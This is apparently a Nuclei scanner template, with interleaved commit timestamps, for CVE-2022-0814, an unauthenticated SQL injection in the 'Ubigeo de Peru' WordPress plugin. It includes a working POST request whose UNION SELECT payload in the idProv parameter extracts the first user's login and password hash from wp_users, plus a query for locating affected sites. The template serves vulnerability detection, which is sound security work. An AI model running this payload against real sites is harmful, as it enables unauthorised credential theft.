2023-10-17 08:16:05 +00:00
id : CVE-2022-0814
2023-10-17 07:20:28 +00:00
info :
name : Ubigeo de Peru < 3.6.4 - SQL Injection
author : r3Y3r53
severity : critical
description : |
The plugin does not properly sanitise and escape some parameters before using them in SQL statements via various AJAX actions, some of which are available to unauthenticated users, leading to SQL Injections.
2023-10-17 17:52:26 +00:00
remediation : Fixed in version 3.6.4
2023-10-17 08:16:05 +00:00
reference :
2023-10-17 07:20:28 +00:00
- https://wpscan.com/vulnerability/fd84dc08-0079-4fcf-81c3-a61d652e3269
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0814
- https://wordpress.org/plugins/ubigeo-peru/
2024-03-23 09:28:19 +00:00
- https://github.com/cyllective/CVEs
2023-10-17 07:20:28 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2022-0814
cwe-id : CWE-89
2024-03-23 09:28:19 +00:00
epss-score : 0.03633
epss-percentile : 0.91467
2023-10-17 17:52:26 +00:00
cpe : cpe:2.3:a:ubigeo_de_peru_para_woocommerce_project:ubigeo_de_peru_para_woocommerce:*:*:*:*:*:wordpress:*:*
2023-10-17 07:20:28 +00:00
metadata :
verified : true
2023-10-17 17:52:26 +00:00
max-request : 1
vendor : ubigeo_de_peru_para_woocommerce_project
product : ubigeo_de_peru_para_woocommerce
framework : wordpress
2023-10-17 07:20:28 +00:00
publicwww-query : "/wp-content/plugins/ubigeo-peru/"
2023-12-05 09:50:33 +00:00
tags : cve,cve2022,wordpress,wpscan,wp-plugin,sqli,ubigeo-peru,unauth,ubigeo_de_peru_para_woocommerce_project
2023-10-17 07:20:28 +00:00
http :
- raw :
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
action=rt_ubigeo_load_distritos_address&idProv=1%20UNION%20SELECT%201,(SELECT%20user_login%20FROM%20wp_users%20WHERE%20ID%20=%201),(SELECT%20user_pass%20FROM%20wp_users%20WHERE%20ID%20=%201)%20from%20wp_users#
matchers-condition : and
matchers :
- type : word
part : body
words :
- 'idProv'
- 'idDist'
- 'distrito'
condition : and
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2024-03-25 11:57:16 +00:00
# digest: 4b0a004830460221009d0af829a2026e1cbcd7a5b53b3113160e4aa16d2d3f2783e0c08139ae359b11022100fe9df65b9b640062afc5b0aad1fd9ba391be5046758f6b0eda26ff19ed069318:922c64590222798bb761d5b6d8e72950